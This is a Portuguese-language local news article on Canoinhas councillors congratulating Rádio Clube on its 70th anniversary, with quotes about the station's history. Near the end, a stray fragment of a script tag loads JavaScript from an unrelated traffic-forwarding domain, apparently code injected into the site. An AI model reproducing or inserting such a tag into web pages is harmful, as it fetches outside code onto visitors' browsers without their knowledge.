InícioDestaqueRádio Clube completa 70 anos: Vereadores parabenizam 5ª emissora mais antiga do...

Rádio Clube completa 70 anos: Vereadores parabenizam 5ª emissora mais antiga do país

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Em requerimento apresentado pelos vereadores de Canoinhas na sessão desta segunda, 27, a emissora Rádio Clube de Canoinhas, hoje Clube FM 94,9, receberá ofício de parabenização pela passagem dos seus 70 anos, comemorado no dia 25 de agosto. O documento será encaminhado ao diretor Joselde Cândido Cubas Batista, e todos os colaboradores.

Vereadores aproveitaram para destacar a importância da emissora na história do município e região, sendo hoje a quinta mais antiga do país.

Paulo Glinski (PSD) comentou que participou do evento de comemoração do aniversário da rádio no sábado, 25, junto com o vereador Edmilson Verka (PR). “Pudemos vivenciar um pouco da história e importância da rádio na história do nosso município e região, e hoje ampliando sua área de atuação, podemos observar a força que o rádio tem na vida das pessoas”, destacou Glinski.

Edmilson Verka (PR), que está apresentando o Programa “Gentilezas” na rádio há 28 anos, também falou do importante papel da rádio para a sociedade. “Quantas pessoas deram seu depoimento no sábado, quando a rádio comemorou seus 70 anos, falando sobre a importância que o meio de comunicação tem em suas vidas”. Verka também frisou que hoje a emissora está tendo um grande alcance, não só pela internet, que é mundial, mas com os 30 mil watts de potência, também alcançando até Curitiba – PR.

Norma Pereira (PSDB) ainda lembrou que até poucos anos atrás as pessoas acreditavam que com tanta tecnologia as rádios pudessem ir diminuindo sua força, “mas não, a Rádio Clube nesses anos inovou, se reinventou, e hoje está cada vez mais forte e presente na vida das pessoas”.

Wilmar Sudoski (PSD) também falou sobre a importante voz do rádio de Canoinhas: “eu cresci ouvindo o Roberto Edy”. O radialista está trabalhando há 55 anos na emissora.

Vereador Coronel Mário Erzinger (PR) lembrou também que o locutor Roberto Edy pode ser homenageado pela Câmara por estar à frente da rádio por mais de meia década e ser um profissional tão importante “na história de uma das rádios que é a quinta mais antiga do país”, finalizou.

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.